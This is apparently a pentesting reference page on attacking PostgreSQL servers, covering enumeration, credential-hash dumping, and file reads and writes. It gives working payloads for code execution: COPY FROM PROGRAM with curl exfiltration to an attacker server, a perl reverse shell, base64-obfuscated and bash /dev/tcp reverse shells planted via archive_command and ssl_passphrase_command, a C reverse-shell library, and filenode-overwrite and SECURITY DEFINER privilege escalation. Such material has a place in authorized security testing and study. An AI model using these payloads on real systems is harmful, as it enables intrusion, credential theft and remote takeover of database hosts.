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PostgreSQL is described as an object-relational database system that is open source. This system not only utilizes the SQL language but also enhances it with additional features. Its capabilities allow it to handle a wide range of data types and operations, making it a versatile choice for developers and organizations.
Default port: 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use.
PORT STATE SERVICE
5432/tcp open pgsql
psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles
# Get current user
SELECT user;
# Get current database
SELECT current_catalog;
# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+
#List databases
SELECT datname FROM pg_database;
#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;
# Get languages
SELECT lanname,lanacl FROM pg_language;
# Show installed extensions
SHOW rds.extensions;
SELECT * FROM pg_extension;
# Get history of commands executed
\s
โ ๏ธ
If running \list
you find a database called rdsadmin
you know you are inside an AWS postgresql database.
For more information about how to abuse a PostgreSQL database check:
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
According to this research, when a connection attempt fails, dblink
throws an sqlclient_unable_to_establish_sqlconnection
exception including an explanation of the error. Examples of these details are listed below.
SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
user=name
password=secret
dbname=abc
connect_timeout=10');
DETAIL: could not connect to server: No route to host Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
DETAIL: could not connect to server: Connection refused Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
DETAIL: server closed the connection unexpectedly This probably means
the server terminated abnormally before or while processing the request
or
DETAIL: FATAL: password authentication failed for user "name"
DETAIL: could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
In PL/pgSQL functions, it is currently not possible to obtain exception details. However, if you have direct access to the PostgreSQL server, you can retrieve the necessary information. If extracting usernames and passwords from the system tables is not feasible, you may consider utilizing the wordlist attack method discussed in the preceding section, as it could potentially yield positive results.
Role Types | |
---|---|
rolsuper | Role has superuser privileges |
rolinherit | Role automatically inherits privileges of roles it is a member of |
rolcreaterole | Role can create more roles |
rolcreatedb | Role can create databases |
rolcanlogin | Role can log in. That is, this role can be given as the initial session authorization identifier |
rolreplication | Role is a replication role. A replication role can initiate replication connections and create and drop replication slots. |
rolconnlimit | For roles that can log in, this sets maximum number of concurrent connections this role can make. -1 means no limit. |
rolpassword | Not the password (always reads as ******** ) |
rolvaliduntil | Password expiry time (only used for password authentication); null if no expiration |
rolbypassrls | Role bypasses every row-level security policy, see Section 5.8 for more information. |
rolconfig | Role-specific defaults for run-time configuration variables |
oid | ID of role |
pg_execute_server_program
you can execute programspg_read_server_files
you can read filespg_write_server_files
you can write filesโน๏ธ
Note that in Postgres a user, a group and a role is the same. It just depend on how you use it and if you allow it to login.
# Get users roles
\du
#Get users roles & groups
# r.rolpassword
# r.rolconfig,
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolbypassrls,
r.rolconnlimit,
r.rolvaliduntil,
r.oid,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;
# Check if current user is superiser
## If response is "on" then true, if "off" then false
SELECT current_setting('is_superuser');
# Try to grant access to groups
## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
## You will probably get this error:
## Cannot GRANT on the "pg_write_server_files" role without being a member of the role.
# Create new role (user) as member of a role (group)
CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files;
## Common error
## Cannot GRANT on the "pg_read_server_files" role without being a member of the role.
# Get owners of tables
select schemaname,tablename,tableowner from pg_tables;
## Get tables where user is owner
select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres';
# Get your permissions over tables
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;
#Check users privileges over a table (pg_shadow on this example)
## If nothing, you don't have any permission
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';
# Interesting functions are inside pg_catalog
\df * #Get all
\df *pg_ls* #Get by substring
\df+ pg_read_binary_file #Check who has access
# Get all functions of a schema
\df pg_catalog.*
# Get all functions of a schema (pg_catalog in this case)
SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position
FROM information_schema.routines
LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name
WHERE routines.specific_schema='pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;
# Another aparent option
SELECT * FROM pg_proc;
From this commitmembers of the defined DEFAULT_ROLE_READ_SERVER_FILES
group (called pg_read_server_files
) and super users can use the COPY
method on any path (check out convert_and_check_filename
in genfile.c
):
# Read file
CREATE TABLE demo(t text);
COPY demo from '/etc/passwd';
SELECT * FROM demo;
โ ๏ธ
Remember that if you aren't super user but has the CREATEROLE permissions you can make yourself member of that group:
GRANT pg_read_server_files TO username;
There are other postgres functions that can be used to read file or list a directory. Only superusers and users with explicit permissions can use them:
# Before executing these function go to the postgres DB (not in the template1)
\c postgres
## If you don't do this, you might get "permission denied" error even if you have permission
select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd', 0, 1000000);
select * from pg_read_binary_file('/etc/passwd');
# Check who has permissions
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file
# Try to grant permissions
GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
# By default you can only access files in the datadirectory
SHOW data_directory;
# But if you are a member of the group pg_read_server_files
# You can access any file, anywhere
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation
You can find more functions in https://www.postgresql.org/docs/current/functions-admin.html
Only super users and members of pg_write_server_files
can use copy to write files.
copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';
โ ๏ธ
Remember that if you aren't super user but has the CREATEROLE
permissions you can make yourself member of that group:
GRANT pg_write_server_files TO username;
Remember that COPY cannot handle newline chars, therefore even if you are using a base64 payload you need to send a one-liner.
A very important limitation of this technique is that copy
cannot be used to write binary files as it modify some binary values.
However, there are other techniques to upload big binary files:
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If you have the necessary permissions to read and write PostgreSQL server files, you can update any table on the server by overwriting the associated file node in the PostgreSQL data directory. More on this technique here.
Required steps:
Obtain the PostgreSQL data directory
SELECT setting FROM pg_settings WHERE name = 'data_directory';
Note: If you are unable to retrieve the current data directory path from settings, you can query the major PostgreSQL version through the SELECT version()
query and try to brute-force the path. Common data directory paths on Unix installations of PostgreSQL are /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. A common cluster name is main
.
Obtain a relative path to the filenode, associated with the target table
SELECT pg_relation_filepath('{TABLE_NAME}')
This query should return something like base/3/1337
. The full path on disk will be $DATA_DIRECTORY/base/3/1337
, i.e. /var/lib/postgresql/13/main/base/3/1337
.
Download the filenode through the lo_*
functions
SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
Get the datatype, associated with the target table
SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
Use the PostgreSQL Filenode Editor to edit the filenode; set all rol*
boolean flags to 1 for full permissions.
python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}
Re-upload the edited filenode via the lo_*
functions, and overwrite the original file on the disk
SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
(Optionally) Clear the in-memory table cache by running an expensive SQL query
SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
You should now see updated table values in the PostgreSQL.
You can also become a superadmin by editing the pg_authid
table. See the following section.
Since version 9.3, only super users and member of the group pg_execute_server_program
can use copy for RCE (example with exfiltration:
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
Example to exec:
#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
โ ๏ธ
Remember that if you aren't super user but has the CREATEROLE
permissions you can make yourself member of that group:
GRANT pg_execute_server_program TO username;
Or use the multi/postgres/postgres_copy_from_program_cmd_exec
module from metasploit.
More information about this vulnerability here. While reported as CVE-2019-9193, Postges declared this was a feature and will not be fixed.
Once you have learned from the previous post how to upload binary files you could try obtain RCE uploading a postgresql extension and loading it.
โน๏ธ
The following RCE vectors are especially useful in constrained SQLi contexts, as all steps can be performed through nested SELECT statements
The configuration file of PostgreSQL is writable by the postgres user, which is the one running the database, so as superuser, you can write files in the filesystem, and therefore you can overwrite this file.
More information about this technique here.
The configuration file have some interesting attributes that can lead to RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Path to the private key of the databasessl_passphrase_command = ''
If the private file is protected by password (encrypted) postgresql will execute the command indicated in this attribute.ssl_passphrase_command_supports_reload = off
If this attribute is on the command executed if the key is protected by password will be executed when pg_reload_conf()
is executed.Then, an attacker will need to:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
pg_reload_conf()
While testing this I noticed that this will only work if the private key file has privileges 640, it's owned by root and by the group ssl-cert or postgres (so the postgres user can read it), and is placed in /var/lib/postgresql/12/main.
More information about this config and about WAL here.
Another attribute in the configuration file that is exploitable is archive_command
.
For this to work, the archive_mode
setting has to be 'on'
or 'always'
. If that is true, then we could overwrite the command in archive_command
and force it to execute via the WAL (write-ahead logging) operations.
The general steps are:
SELECT current_setting('archive_mode')
archive_command
with the payload. For eg, a reverse shell: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
SELECT pg_reload_conf()
SELECT pg_switch_wal()
or SELECT pg_switch_xlog()
for some Postgres versionsMore information about this technique here.
This attack vector takes advantage of the following configuration variables:
session_preload_libraries
-- libraries that will be loaded by the PostgreSQL server at the client connection.dynamic_library_path
-- list of directories where the PostgreSQL server will search for the libraries.We can set the dynamic_library_path
value to a directory, writable by the postgres
user running the database, e.g., /tmp/
directory, and upload a malicious .so
object there. Next, we will force the PostgreSQL server to load our newly uploaded library by including it in the session_preload_libraries
variable.
The attack steps are:
Download the original postgresql.conf
Include the /tmp/
directory in the dynamic_library_path
value, e.g. dynamic_library_path = '/tmp:$libdir'
Include the malicious library name in the session_preload_libraries
value, e.g. session_preload_libraries = 'payload.so'
Check major PostgreSQL version via the SELECT version()
query
Compile the malicious library code with the correct PostgreSQL dev package Sample code:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
void _init() {
/*
code taken from https://www.revshells.com/
*/
int port = REVSHELL_PORT;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("REVSHELL_IP");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}
Compiling the code:
gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
Upload the malicious postgresql.conf
, created in steps 2-3, and overwrite the original one
Upload the payload.so
from step 5 to the /tmp
directory
Reload the server configuration by restarting the server or invoking the SELECT pg_reload_conf()
query
At the next DB connection, you will receive the reverse shell connection.
According to the docs: Roles having CREATEROLE
privilege can grant or revoke membership in any role that is not a superuser.
So, if you have CREATEROLE
permission you could grant yourself access to other roles (that aren't superuser) that can give you the option to read & write files and execute commands:
# Access to execute commands
GRANT pg_execute_server_program TO username;
# Access to read files
GRANT pg_read_server_files TO username;
# Access to write files
GRANT pg_write_server_files TO username;
Users with this role can also change the passwords of other non-superusers:
#Change password
ALTER USER user_name WITH PASSWORD 'new_password';
It's pretty common to find that local users can login in PostgreSQL without providing any password. Therefore, once you have gathered permissions to execute code you can abuse these permissions to gran you SUPERUSER
role:
COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
โน๏ธ
This is usually possible because of the following lines in the pg_hba.conf
file:
# "local" is for Unix domain socket connections only
local all all trust
# IPv4 local connections:
host all all 127.0.0.1/32 trust
# IPv6 local connections:
host all all ::1/128 trust
In this writeup is explained how it was possible to privesc in Postgres GCP abusing ALTER TABLE privilege that was granted to the user.
When you try to make another user owner of a table you should get an error preventing it, but apparently GCP gave that option to the not-superuser postgres user in GCP:
Joining this idea with the fact that when the INSERT/UPDATE/ANALYZE commands are executed on a table with an index function, the function is called as part of the command with the table ownerโs permissions. It's possible to create an index with a function and give owner permissions to a super user over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);
In PostgreSQL, this flow looks something like this:
CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);
INSERT INTO temp_table VALUES ('dummy content');
/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql IMMUTABLE AS 'select ''nothing'';';
CREATE INDEX index_malicious ON public.temp_table (suid_function(data));
ALTER TABLE temp_table OWNER TO cloudsqladmin;
/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';
ANALYZE public.temp_table;
Then, the shell_commands_results
table will contain the output of the executed code:
uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
Some misconfigured postgresql instances might allow login of any local user, it's possible to local from 127.0.0.1 using the dblink
function:
\du * # Get Users
\l # Get databases
SELECT * FROM dblink('host=127.0.0.1
port=5432
user=someuser
password=supersecret
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
โ ๏ธ
Note that for the previos query to work the function dblink
needs to exist. If it doesn't you could try to create it with
CREATE EXTENSION dblink;
If you have the password of a user with more privileges, but the user is not allowed to login from an external IP you can use the following function to execute queries as that user:
SELECT * FROM dblink('host=127.0.0.1
user=someuser
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
It's possible to check if this function exists with:
SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
In this writeup, pentesters were able to privesc inside a postgres instance provided by IBM, because they found this function with the SECURITY DEFINER flag:
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
LANGUAGE 'plpgsql'
VOLATILE SECURITY DEFINER
PARALLEL UNSAFE
COST 100
AS $BODY$
DECLARE
persist_dblink_extension boolean;
BEGIN
persist_dblink_extension := create_dblink_extension();
PERFORM dblink_connect(format('dbname=%s', db_name));
PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
PERFORM dblink_disconnect();
โฆ
As explained in the docs a function with SECURITY DEFINER is executed with the privileges of the user that owns it. Therefore, if the function is vulnerable to SQL Injection or is doing some privileged actions with params controlled by the attacker, it could be abused to escalate privileges inside postgres.
In the line 4 of the previous code you can see that the function has the SECURITY DEFINER flag.
CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
And then execute commands:
PL/pgSQL is a fully featured programming language that offers greater procedural control compared to SQL. It enables the use of loops and other control structures to enhance program logic. In addition, SQL statements and triggers have the capability to invoke functions that are created using the PL/pgSQL language. This integration allows for a more comprehensive and versatile approach to database programming and automation.
You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.
โน๏ธ
The following privesc vector is especially useful in constrained SQLi contexts, as all steps can be performed through nested SELECT statements
If you can read and write PostgreSQL server files, you can become a superuser by overwriting the PostgreSQL on-disk filenode, associated with the internal pg_authid
table.
Read more about this technique here.
The attack steps are:
pg_authid
tablelo_*
functionspg_authid
tablerol*
boolean flags to 1 for full permissions.lo_*
functions, and overwrite the original file on the diskmsf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
Inside the postgresql.conf file you can enable postgresql logs changing:
log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on
sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/
Then, restart the service.
pgadmin is an administration and development platform for PostgreSQL.
You can find passwords inside the pgadmin4.db file
You can decrypt them using the decrypt function inside the script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
sqlite3 pgadmin4.db ".schema"
sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db
Client authentication in PostgreSQL is managed through a configuration file called pg_hba.conf. This file contains a series of records, each specifying a connection type, client IP address range (if applicable), database name, user name, and the authentication method to use for matching connections. The first record that matches the connection type, client address, requested database, and user name is used for authentication. There is no fallback or backup if authentication fails. If no record matches, access is denied.
The available password-based authentication methods in pg_hba.conf are md5, crypt, and password. These methods differ in how the password is transmitted: MD5-hashed, crypt-encrypted, or clear-text. It's important to note that the crypt method cannot be used with passwords that have been encrypted in pg_authid.
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